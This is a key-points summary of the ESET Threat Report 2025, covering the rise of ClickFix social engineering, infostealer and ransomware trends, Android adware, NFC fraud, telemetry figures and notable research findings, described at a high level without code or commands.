Eset Threat Report 2025

Keypoints

• Typical report structure: Foreword (executive framing and author remarks), Threat landscape trends (detailed case studies and emerging vectors), Threat telemetry (quantitative detection and trend charts), Research publications (deep dives and investigations), About this report (methodology and data sources), About ESET and credits (organization background and contributors).
• What each main section typically discusses: Foreword highlights major themes; Threat landscape trends breaks out prominent campaigns, new techniques, and platform-specific threats; Threat telemetry presents percentage changes and comparative charts; Research publications summarize technical analyses and notable operations; About sections explain data collection, exclusions, and limitations.
• ClickFix: a new social engineering vector that rose 517% between H2 2024 and H1 2025, now ~8% of blocked attacks and the second most common vector after phishing; it tricks users into pasting and executing malicious scripts that can deliver infostealers, ransomware, RATs, cryptominers, and nation-state malware.
• Infostealer dynamics: Agent Tesla declined while SnakeStealer (Snake Keylogger / 404 Keylogger) became the most-detected infostealer; coordinated disruption operations targeted Lumma Stealer and Danabot, showing effective cross-industry and law-enforcement action.
• Android threats: adware detections up 160%, driven by Kaleidoscope’s “evil twin” scheme—pairing benign store apps with malicious clones in third-party stores to push intrusive ads and degrade device performance.
• NFC fraud evolution: NFC-related scams increased more than thirty-five-fold, going from roughly one detection per week to dozens per week; new relay and phishing techniques (e.g., NGate, GhostTap, SuperCard) demonstrate attackers adapting to defenses.
• Ransomware landscape: ransomware detections rose 30% while ransom payments fell—attributed to takedowns, exit scams, and decreased trust—concurrently, visible infighting (notably DragonForce) disrupted major RaaS players such as RansomHub.
• Telemetry highlights: overall detections decreased by 3% year-on-period; Android detections increased by 62%; cryptocurrency-focused threats dropped 26%; ransomware increased 30%—these point to shifting platform focus and attacker priorities.
• Operational takeaways: ClickFix’s simplicity and believability make social engineering highly effective; attackers rapidly copy successful techniques across platforms, underscoring the need for timely user warnings and execution-time safeguards (similar to macro/file-origin prompts).
• Threat actor and ecosystem trends: continued prominence of malware-as-a-service models, frequent turnover among infostealer families, and opportunistic reuse of toolkits by financially motivated groups and nation-state-aligned actors.
• Law enforcement and industry cooperation: multinational disruptions (ESET with Microsoft, FBI, Europol, etc.) successfully degraded Lumma and Danabot operations—highlighting the effectiveness of coordinated takedowns in reducing exfiltration and infrastructure resilience.
• Recurring themes: social engineering innovation, mobile-first monetization (adware/PUA), exploitation of emerging tech (NFC), and fragmentation plus public infighting in the ransomware ecosystem.
• Notable technical findings and research: UEFI Secure Boot bypass (CVE-2024-7344), supply-chain compromise (PlushDaemon), espionage campaigns (MirrorFace, FishMonger, BladedFeline), and novel toolsets (SparrowDoor, Spellbinder) illustrate both opportunistic and targeted advanced threats.
• Data caveats and methodology: statistics are based on ESET global telemetry, generally exclude PUAs/adware unless specified, emphasize trend lines over absolute counts, and include platform-specific nuances where stated.
• Impactful recommendations implied by the report: prioritize user education against social-engineering vectors like ClickFix, strengthen mobile app vetting and third-party store monitoring, enhance NFC transaction protections, maintain cross-sector incident-sharing, and support law-enforcement disruption efforts.